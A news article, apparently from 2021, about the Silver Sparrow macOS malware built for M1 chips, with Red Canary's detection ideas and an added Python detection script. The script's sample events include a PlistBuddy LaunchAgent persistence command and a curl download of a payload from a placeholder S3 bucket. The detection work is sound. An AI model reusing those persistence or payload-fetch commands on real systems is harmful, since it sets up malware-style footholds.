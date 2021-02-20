



The second known malware, compiled to run natively on the M1 Mac, was discovered by security firm Red Canary.

This malicious package, named “Silver Sparrow,” is said to use the macOS installer’s JavaScript API to execute suspicious commands. However, after observing the malware for more than a week, neither Red Canary nor its research partners observed the final payload, so the exact threat posed by the malware remains a mystery.

Nonetheless, Red Canary said the malware could be a “quite serious threat.”

Silver Sparrow has not yet been confirmed to deliver additional malicious payloads, but it has already demonstrated M1 chip compatibility, global reach, a relatively high infection rate, and operational maturity. It is a fairly serious threat, positioned to deliver potentially impactful payloads at short notice.

According to data provided by Malwarebytes, “Silver Sparrow” had infected 29,139 macOS systems in 153 countries as of February 17, including “mass detections in the United States, United Kingdom, Canada, France and Germany.” Red Canary has not identified how many of these systems are M1 Macs.

Given that the “Silver Sparrow” binaries “do not seem to do much” yet, Red Canary called them “bystander binaries”. When run on an Intel-based Mac, the binary simply displays a window containing only the text “Hello, World!”, while the Apple Silicon binary shows a red window saying “Done!”.

Red Canary shares methods for detecting various macOS threats, but the steps are not specific to “Silver Sparrow” detection.

- Look for a process that appears to be PlistBuddy executing in conjunction with a command line containing LaunchAgents, RunAtLoad and true. This analytic helps find multiple macOS malware families that establish LaunchAgent persistence.
- Look for a process that appears to be sqlite3 executing in conjunction with a command line containing LSQuarantine. This analytic helps find multiple macOS malware families that manipulate or search the metadata of downloaded files.
- Look for processes executing in conjunction with a command line containing s3.amazonaws.com. This analytic helps find multiple macOS malware families that use S3 buckets for distribution.
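The three analytics above are described in prose only; the following is an added example (not Red Canary's code, and not from the original post) that applies them to process-execution events of the kind a macOS endpoint agent records. The event records and field layout are constructed for illustration, and the third rule deliberately matches any process name because the text above does not name one.

```python
"""Apply the three process-based detection analytics described above to a
list of process-execution events.

Each event is a (process_name, command_line) pair. The events below are
constructed samples, not real telemetry; the rule names are assumptions
chosen for readability.
"""

# Constructed sample events, in the shape an endpoint agent might record.
SAMPLE_EVENTS = [
    # LaunchAgent persistence being written with PlistBuddy
    ("PlistBuddy",
     "/usr/libexec/PlistBuddy -c 'Add :RunAtLoad bool true' "
     "/Users/alice/Library/LaunchAgents/com.example.agent.plist"),
    # Querying the quarantine database for downloaded-file metadata
    ("sqlite3",
     "sqlite3 /Users/alice/Library/Preferences/"
     "com.apple.LaunchServices.QuarantineEventsV2 "
     "'select LSQuarantineDataURLString from LSQuarantineEvent'"),
    # Fetching a payload from an S3 bucket (hostname is a placeholder)
    ("curl",
     "curl -o /tmp/update.zip "
     "https://example-bucket.s3.amazonaws.com/update.zip"),
    # Benign: PlistBuddy reading an unrelated preferences file
    ("PlistBuddy",
     "/usr/libexec/PlistBuddy -c 'Print' "
     "/Users/alice/Library/Preferences/com.apple.dock.plist"),
    # Benign: listing the LaunchAgents directory, no PlistBuddy involved
    ("ls", "ls -la /Users/alice/Library/LaunchAgents"),
]

# (rule name, allowed process names or None for any, required command-line
# substrings). All substrings must be present for the rule to fire.
RULES = [
    ("launchagent_persistence", {"PlistBuddy"},
     ["LaunchAgents", "RunAtLoad", "true"]),
    ("quarantine_metadata_access", {"sqlite3"}, ["LSQuarantine"]),
    ("s3_bucket_fetch", None, ["s3.amazonaws.com"]),
]


def match_rules(process_name, cmdline):
    """Return the names of every rule that the single event satisfies."""
    hits = []
    for rule_name, allowed_procs, terms in RULES:
        if allowed_procs is not None and process_name not in allowed_procs:
            continue
        if all(term in cmdline for term in terms):
            hits.append(rule_name)
    return hits


def scan(events):
    """Return (rule, process, cmdline) tuples for every event that matches."""
    findings = []
    for proc, cmd in events:
        for rule in match_rules(proc, cmd):
            findings.append((rule, proc, cmd))
    return findings


if __name__ == "__main__":
    for rule, proc, cmd in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {proc}: {cmd}")
```

Substring matching keeps the example faithful to the analytics as written, but it is loose: the token true, for example, will also match unrelated PlistBuddy invocations that happen to set a boolean, so in a real deployment these rules are a starting point to be tuned against the environment's baseline rather than a finished detector.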

The first piece of malware that can run natively on the M1 Mac was discovered just a few days ago. Technical details about this second malware can be found in the Red Canary blog post. Ars Technica also has a good explanation.

